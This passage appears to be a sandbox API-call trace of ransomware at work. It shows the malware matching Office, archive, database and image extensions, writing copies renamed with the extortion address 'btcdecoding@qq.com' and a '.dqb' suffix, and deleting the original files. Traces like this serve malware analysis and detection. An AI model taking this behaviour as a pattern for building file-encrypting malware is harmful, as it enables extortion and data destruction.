nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.039] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.039] ReadFile (in: hFile=0x228, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.043] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.044] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.044] ReadFile (in: hFile=0x228, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.058] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.058] WriteFile (in: hFile=0x228, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0049.187] SetEndOfFile (hFile=0x228) returned 1 [0049.275] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fc24e0 [0049.282] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.282] WriteFile (in: hFile=0x228, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.282] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.282] WriteFile (in: hFile=0x228, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.283] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.283] WriteFile (in: hFile=0x228, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.285] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0049.285] CloseHandle (hObject=0x228) returned 1 [0050.200] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0050.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.414] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.414] lstrlenW (lpString=".doc") returned 4 [0050.415] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".docx") returned 5 [0050.415] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.415] lstrlenW (lpString=".pdf") returned 4 [0050.415] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".xls") returned 4 [0050.415] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".xlsx") returned 5 [0050.415] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.415] lstrlenW (lpString=".ppt") returned 4 [0050.415] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString=".zip") returned 4 [0050.415] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".rar") returned 4 [0050.415] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".bz2") returned 4 [0050.415] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.415] lstrlenW (lpString=".7z") returned 3 [0050.415] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString=".dbf") returned 4 [0050.415] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString=".1cd") returned 4 [0050.415] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString=".jpg") returned 4 [0050.415] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.415] lstrlenW (lpString=".doc") returned 4 [0050.415] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.415] lstrlenW (lpString=".docx") returned 5 [0050.415] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.416] lstrlenW (lpString=".pdf") returned 4 [0050.416] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString=".xls") returned 4 [0050.416] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString=".xlsx") returned 5 [0050.416] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.416] lstrlenW (lpString=".ppt") returned 4 [0050.416] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.416] lstrlenW (lpString=".zip") returned 4 [0050.416] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString=".rar") returned 4 [0050.416] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString=".bz2") returned 4 [0050.416] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.416] lstrlenW (lpString=".7z") returned 3 [0050.416] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.416] lstrlenW (lpString=".dbf") returned 4 [0050.416] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.416] lstrlenW (lpString=".1cd") returned 4 [0050.416] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.416] lstrlenW (lpString=".jpg") returned 4 [0050.416] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.416] lstrcmpiW (lpString1=".sys", lpString2=".dqb") returned 1 [0050.416] lstrlenW (lpString="pagefile.sys") returned 12 [0050.416] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString=".doc") returned 4 [0050.417] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString=".docx") returned 5 [0050.417] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0050.417] lstrlenW (lpString=".pdf") returned 4 [0050.417] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString=".xls") returned 4 [0050.417] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.417] lstrlenW (lpString=".xlsx") returned 5 [0050.417] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0050.417] lstrlenW (lpString=".ppt") returned 4 [0050.417] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString=".zip") returned 4 [0050.417] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0050.417] lstrlenW (lpString=".rar") returned 4 [0050.417] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString=".bz2") returned 4 [0050.417] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString=".7z") returned 3 [0050.417] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString=".dbf") returned 4 [0050.417] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString=".1cd") returned 4 [0050.417] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0050.417] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.417] lstrlenW (lpString=".jpg") returned 4 [0050.417] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString=".doc") returned 4 [0050.418] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString=".docx") returned 5 [0050.418] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0050.418] lstrlenW (lpString=".pdf") returned 4 [0050.418] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString=".xls") returned 4 [0050.418] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.418] lstrlenW (lpString=".xlsx") returned 5 [0050.418] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0050.418] lstrlenW (lpString=".ppt") returned 4 [0050.418] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString=".zip") returned 4 [0050.418] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0050.418] lstrlenW (lpString=".rar") returned 4 [0050.418] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString=".bz2") returned 4 [0050.418] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString=".7z") returned 3 [0050.418] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString=".dbf") returned 4 [0050.418] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString=".1cd") returned 4 [0050.418] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0050.418] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.418] lstrlenW (lpString=".jpg") returned 4 [0050.418] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.419] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0050.419] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0050.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.824] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=99136) returned 1 [0050.824] CloseHandle (hObject=0x224) returned 1 [0050.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20 [0050.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.824] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.824] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.825] GetLastError () returned 0x0 [0050.825] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x18340, lpOverlapped=0x0) returned 1 [0050.828] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x18350, lpOverlapped=0x0) returned 1 [0050.830] ReadFile (in: hFile=0x224, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.830] WriteFile (in: hFile=0x178, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.831] SetEndOfFile (hFile=0x178) returned 1 [0050.831] CloseHandle (hObject=0x178) returned 1 [0050.831] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.831] SetEndOfFile (hFile=0x224) returned 1 [0050.832] CloseHandle (hObject=0x224) returned 1 [0050.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.832] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString=".doc") returned 4 [0050.833] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString=".docx") returned 5 [0050.833] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.833] lstrlenW (lpString=".pdf") returned 4 [0050.833] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString=".xls") returned 4 [0050.833] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString=".xlsx") returned 5 [0050.833] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.833] lstrlenW (lpString=".ppt") returned 4 [0050.833] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString=".zip") returned 4 [0050.833] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString=".rar") returned 4 [0050.833] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.833] lstrlenW (lpString=".bz2") returned 4 [0050.833] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.833] lstrlenW (lpString=".7z") returned 3 [0050.833] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString=".dbf") returned 4 [0050.833] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString=".1cd") returned 4 [0050.833] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.833] lstrlenW (lpString=".jpg") returned 4 [0050.833] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString=".doc") returned 4 [0050.834] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString=".docx") returned 5 [0050.834] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.834] lstrlenW (lpString=".pdf") returned 4 [0050.834] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString=".xls") returned 4 [0050.834] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString=".xlsx") returned 5 [0050.834] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.834] lstrlenW (lpString=".ppt") returned 4 [0050.834] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString=".zip") returned 4 [0050.834] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString=".rar") returned 4 [0050.834] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.834] lstrlenW (lpString=".bz2") returned 4 [0050.834] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.834] lstrlenW (lpString=".7z") returned 3 [0050.834] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString=".dbf") returned 4 [0050.834] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString=".1cd") returned 4 [0050.834] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.834] lstrlenW (lpString=".jpg") returned 4 [0050.834] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.835] lstrcmpiW (lpString1=".EXE", lpString2=".dqb") returned 1 [0050.835] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0050.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.511] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=629664) returned 1 [0051.511] CloseHandle (hObject=0x200) returned 1 [0051.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20 [0051.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.511] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.511] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0051.512] GetLastError () returned 0x0 [0051.512] ReadFile (in: hFile=0x200, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x99ba0, lpOverlapped=0x0) returned 1 [0051.524] WriteFile (in: hFile=0x1f8, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x99bb0, lpOverlapped=0x0) returned 1 [0051.534] ReadFile (in: hFile=0x200, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.534] WriteFile (in: hFile=0x1f8, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.534] SetEndOfFile (hFile=0x1f8) returned 1 [0051.535] CloseHandle (hObject=0x1f8) returned 1 [0051.535] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.535] SetEndOfFile (hFile=0x200) returned 1 [0051.540] CloseHandle (hObject=0x200) returned 1 [0051.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.540] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1 [0051.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.540] lstrlenW (lpString=".doc") returned 4 [0051.540] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.540] lstrlenW (lpString=".docx") returned 5 [0051.540] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.540] lstrlenW (lpString=".pdf") returned 4 [0051.540] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.540] lstrlenW (lpString=".xls") returned 4 [0051.541] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString=".xlsx") returned 5 [0051.541] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.541] lstrlenW (lpString=".ppt") returned 4 [0051.541] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString=".zip") returned 4 [0051.541] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString=".rar") returned 4 [0051.541] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.541] lstrlenW (lpString=".bz2") returned 4 [0051.541] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.541] lstrlenW (lpString=".7z") returned 3 [0051.541] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString=".dbf") returned 4 [0051.541] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.541] lstrlenW (lpString=".1cd") returned 4 [0051.541] lstrcmpiW 